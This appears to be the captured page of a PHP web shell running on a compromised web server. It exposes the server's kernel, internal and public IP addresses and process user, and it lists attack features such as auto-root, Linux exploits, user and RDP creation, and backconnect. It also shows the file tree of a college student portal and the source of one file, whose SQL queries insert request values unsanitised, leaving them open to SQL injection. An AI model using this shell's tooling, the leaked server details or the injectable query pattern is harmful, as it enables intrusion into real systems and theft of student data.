Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.23.101.241
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
collportal_new /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
AdmLogin.php
714
B
-rw-r--r--
addStudToCls.php
19.78
KB
-rw-r--r--
admdet.php
1.06
KB
-rw-r--r--
assignUserMenu.php
14.91
KB
-rw-r--r--
attEntryDaywise.php
11.03
KB
-rw-r--r--
caccesscontext.php
1.33
KB
-rwxr-xr-x
cappcontext.php
3.76
KB
-rw-r--r--
cdegree.php
4.54
KB
-rw-r--r--
cgetclsdepts.php
1.65
KB
-rw-r--r--
clogin.php
4.31
KB
-rw-r--r--
cmenus.php
2.46
KB
-rw-r--r--
constants.php
818
B
-rw-r--r--
coutput.php
1.84
KB
-rw-r--r--
crequestbroker.php
2.49
KB
-rw-r--r--
csessions.php
548
B
-rw-r--r--
csubject.php
5.75
KB
-rw-r--r--
cuser.php
3.53
KB
-rw-r--r--
cuserType.php
1.86
KB
-rw-r--r--
degreeResultSheet.php
3.82
KB
-rw-r--r--
degreeWise_IA_Report.php
4.79
KB
-rw-r--r--
deletecreatedclass.php
779
B
-rw-r--r--
duringExam.php
2.7
KB
-rw-r--r--
editclass.php
1.06
KB
-rw-r--r--
error_log.php
749
B
-rw-r--r--
getDegSemSubDetnew.php
8.55
KB
-rw-r--r--
getnumword.php
7.45
KB
-rwxr-xr-x
guidelines.php
578
B
-rw-r--r--
iamarksentry.php
6.92
KB
-rw-r--r--
json.php
34.52
KB
-rw-r--r--
jwt.php
13.16
KB
-rw-r--r--
login.php
8.01
KB
-rw-r--r--
marks_entry_qnWise.php
14.01
KB
-rw-r--r--
mregistry.php
21.88
KB
-rw-r--r--
practicalMark.php
28.2
KB
-rw-r--r--
preparethqp.php
23.68
KB
-rw-r--r--
protected.php
661
B
-rw-r--r--
savePassword.php
1.31
KB
-rw-r--r--
saveUserSetup.php
7.46
KB
-rw-r--r--
saveclsdets.php
2.27
KB
-rw-r--r--
sendGridMail.php
1.72
KB
-rw-r--r--
sendsmsapi_onex_new.php
4.19
KB
-rw-r--r--
student.php
61.41
KB
-rw-r--r--
studentsem.php
3.79
KB
-rw-r--r--
subject_Details.php
8.92
KB
-rw-r--r--
updateclass.php
583
B
-rw-r--r--
uploadStudentPhoto.php
2.15
KB
-rw-r--r--
uploadphotoofstud.php
1.84
KB
-rw-r--r--
userRightDetails.php
1.39
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : uploadStudentPhoto.php
<?php function getDegree($aobj_context){ $collcode = $aobj_context->mobj_data["collcode"]; $query = "select distinct ifnull(d.fdegree, '')as value, concat(ifnull(fdescpn, ''), ' ', '[', ifnull(c.fdegree, ''), ']')as label from degree d inner join colldeg c on c.fdegree = d.fdegree inner join student s on s.fcollcode = c.fcollcode and s.fdegree = c.fdegree where ifnull(c.fdegree, '') <> '' and ifnull(c.fcollcode, '')='{$collcode}' and ifnull(d.fdeleted, '')<>'T'"; $res = $aobj_context->mobj_db->GetAll($query); if($res){ echo $aobj_context->mobj_output->ToJSONEnvelope($res, 0, "success"); }else{ $arr['msg'] = "No data found"; echo $aobj_context->mobj_output->ToJSONEnvelope($data, -1, "failure"); return; } } function viewStudentUpdDet($aobj_context){ $collcode = $aobj_context->mobj_data["collcode"]; $data = json_decode($aobj_context->mobj_data["data"], true); $degreeArr = '(' . implode(', ', array_map(function($item) { return "'" . $item . "'"; }, $data['degree'])) . ')'; if($data['type'] === 'pending'){ $cond = "and ifnull(s.fphotopath,'') = ''"; }else if($data['type'] === 'uploaded'){ $cond = "and ifnull(s.fphotopath,'') <> ''"; }else if($data['type'] === 'all'){ $cond = ""; } $query = "select ifnull(s.fregno, '') as fregno, ifnull(s.fphotopath, '')as fphotopath, ifnull(s.fdegree, '')as fdegree, ifnull(s.fname, '')as fname, ifnull(c.funivcode, '')as funivcode from student s, control c where s.fcollcode = '{$collcode}' and s.fdegree in $degreeArr and s.fregno between '{$data['regfrom']}' and '{$data['regto']}' {$cond} order by s.fregno"; $res = $aobj_context->mobj_db->GetAll($query); if($res){ echo $aobj_context->mobj_output->ToJSONEnvelope($res, 0, "success"); }else{ $arr['msg'] = "No data found"; echo $aobj_context->mobj_output->ToJSONEnvelope($data, -1, "failure"); return; } } ?>
Close